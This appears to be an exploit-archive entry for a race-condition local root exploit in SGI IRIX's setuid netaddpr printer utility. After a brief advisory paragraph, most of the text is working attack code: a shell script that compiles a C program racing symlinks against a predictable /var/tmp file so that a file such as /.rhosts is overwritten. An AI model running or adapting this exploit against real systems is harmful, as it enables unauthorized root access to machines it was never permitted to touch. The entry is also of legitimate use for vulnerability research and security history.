SGI IRIX 6.2 - '/usr/lib/netaddpr' Local Privilege Escalation

source: https://www.securityfocus.com/bid/330/info

SGI's IRIX 5.x and 6.x operating system include a utility called /usr/lib/netaddpr. This program can be used by privledged users to add network printing devices to the system. A race condition exists in this program that could allow any "privledged" user to obtain root access.

The netaddpr program is shipped setuid root. As part of its execution, it creates a file in /var/tmp with the file template printersXXXXXX. Because the creation of the file and the actual opening of the file are independant events, there exists a window, during which time an attacker can replace the file with a symbolic link. By making this link point to, for instance, /.rhosts, an attacker can elevate their privledges to that of root. 

#!/bin/sh

PROG="`basename $0`"
if [ $# -ne 1 ]; then
       echo "Usage: $PROG <target>"
       exit 1
fi

cat > expnetpr.c << _CREDIT_TO_ZOMO_
void main(int argc, char *argv[])
{
    char *template = "/var/tmp/printersXXXXXX";
    char *target;
    int pid;

    target = (char *)mktemp(template);

    if ((pid = fork()) > 0) {
            sleep(3);
            umask(0);
            execl("/usr/lib/addnetpr", "addnetpr", "localhost","+", 0);
    }
    else
            while(1) {
                    symlink(argv[1], target);
                    unlink(target);
            }

}
_CREDIT_TO_ZOMO_

/bin/cc expnetpr.c -o expnetpr
if [ ! -f expnetpr ]; then
     echo "Couldn't compile expnetpr.c, lame! \nMake sure that C compiler has been installed from the IDO"
     exit 1
fi

while(`true`)
do
      ./expnetpr $1&
      PID=$!
      sleep 15
      ls -al $1
      killall expnetpr
      killall addnetpr
done